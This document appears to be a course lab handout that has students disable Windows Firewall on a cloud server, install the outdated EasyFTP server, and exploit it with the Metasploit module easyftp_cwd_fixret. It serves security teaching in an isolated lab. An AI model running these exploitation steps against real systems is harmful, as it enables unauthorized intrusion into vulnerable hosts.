H 3C: Metasploit v. EasyFTP (10 pts)

What you need


To use Katoolin and other software to convert the Debian server into an attack platform with some Kali tools, including Metasploit.

Google Cloud Server

If you don't have a Google Cloud Server set up, see these instructions.

Google Cloud Platform Console

Open a Web browser to this URL:


Log in to Google, and you should see your Google Cloud Platform Console.

On the left side, click "Compute Engine".

You should have a Windows server and a Linux server, as shown below.

Task 1: Preparing the Windows Target

Connecting via RDP

Double-click the .rdp file you downloaded previously and log in to connect to your Windows cloud server.

If you don't have that file, you can dowload another one by clicking RDP in your Google Cloud Platform Console.

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.


In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing EasyFTP

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your host system, click the link below to download EasyFtp Server

Drag the downloaded file onto your Windows Server 2016 desktop and drop it there.

On your Windows Server 2016 desktop, right-click easyftp-server- Click "Extract All...". Click Extract.

In the "easyftp-server-" window, double-click the folder.

There are two items in the folder, as shown below.

Double-click ftpconsole.

A blue window opens, as shown below.

At the top left of this window, click the gear icon.

A box pops up. At the top, check the "Bind IP" box and select your IP address, as shown below.

At the bottom, click Ok.

A "Restart Service" box pops up, as shown below. Click Yes.


If the service won't start, a broken version may be already installed. Execute this command to delete the broken service:
sc delete easyftpbasicsvr

Connecting to your Linux Cloud Server

In your Google Cloud Platform Console, in the "linux" line, in the "Connect" column, click the drop-down arrow. Click "Open in browser window", as shown below.

Testing the FTP Service

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
nc 21
You should see a "Welcome to my ftp server" banner, as shown below. If you don't, perform the Troubleshooting steps in the box below.


In the ftpconsole window, click Service, Stop, as shown below. Then click the green arrow to restart the service.

Task 2: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Linux cloud server, execute these commands:
msfconsole -q
search easyftp
A list of easyftp exploits appears, as shown below.

Selecting Options and Target

At the msf > prompt, execute these commands:
use exploit/windows/ftp/easyftp_cwd_fixret
show options
The options required for this exploit are listed. The only required option is RHOST, as shown below,

At the msf > prompt, execute this command:

show targets
The targets are listed. We are using the latest version, Id 9, as shown below,

Exploiting the Target

At the msf > prompt, execute these commands, replacing the IP address with the IP address of your Windows cloud server:
set TARGET 9

H 3c: Architecture (10 pts)

Find the Architecture, which is covered by a green box in the image below. Enter it into the form below.

That's the flag.


Installing metasploit on a cheap Debian VPS
deb2kali A Script to Convert Debian Linux (8.1) into Kali Linux
configure multiple sshd instances on debian 8 (jessie) systemd
systemd unit file for dropbear
How to automatically execute shell script at startup boot on systemd Linux
How to Install VNC w/ GNOME on Debian VPS
How to Install and Configure VNC on Debian 9

Moved to local server 3-21-19
Form removed 7-9-19